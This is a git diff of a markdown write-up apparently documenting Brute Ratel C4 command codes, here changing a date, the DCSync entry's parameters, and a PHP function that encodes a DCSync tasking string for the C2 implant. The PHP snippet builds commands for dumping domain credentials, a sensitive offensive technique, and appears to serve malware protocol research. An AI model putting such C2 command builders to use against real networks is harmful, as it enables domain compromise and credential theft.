@@ -7,7 +7,7 @@ date: 2025-03-28
7
7
8
8
## BRUTERATEL COMMAND LIST PART 4
9
9
10
- updated : 11/04 /2025
10
+ updated : 02/05 /2025
11
11
12
12
## Context
13
13
@@ -42,7 +42,7 @@ Here is a short description of the next 20 command codes and purpose :
42
42
43
43
| Command ID | Description | Parameter |
44
44
| :----------- | :---------------------- | :----------------:|
45
- | "\x81\x98" | [ DCSync] ( #DCSync ) | $TypeFormatString , $ProcFormatString |
45
+ | "\x81\x98" | [ DCSync] ( #DCSync ) | $Admin , $DomainName |
46
46
| "\x53\x49" | [ netshareenum] ( #netshareenum ) | $servername, $level |
47
47
| "\x13\x52" | [ ExecWQLQuery] ( #ExecWQLQuery ) | $query |
48
48
| "\xe7\x81" | [ GetAccountSidFromPid] ( #GetAccountSidFromPid ) | $pid |
@@ -75,12 +75,12 @@ Vicent Le Toux [MakeMeEntrepriseAdmin](https://github.com/vletoux/MakeMeEnterpri
75
75
and Benjamin Delpy [ MimiKatz] ( https://github.com/gentilkiwi/mimikatz/ )
76
76
77
77
``` php
78
- function DCSync($TypeFormatString, $ProcFormatString)
78
+ function DCSync($TypeFormatString, $ProcFormatString, $Admin, $DomainName )
79
79
{
80
80
$TypeFormatString_b64 = base64_encode($TypeFormatString);
81
81
$ProcFormatString_b64 = base64_encode($ProcFormatString);
82
82
83
- $cmd_id = "\x81\x98 $TypeFormatString_b64 $ProcFormatString_b64 AA BB CC DD EE FF GG HH II JJ KK LL MM NN";
83
+ $cmd_id = "\x81\x98 $TypeFormatString_b64 $ProcFormatString_b64 AA BB CC DD EE FF GG HH II JJ KK LL MM NN $Admin $DomainName ";
84
84
$cmd_id_b64 = base64_encode($cmd_id);
85
85
86
86
return $cmd_id_b64;
0 commit comments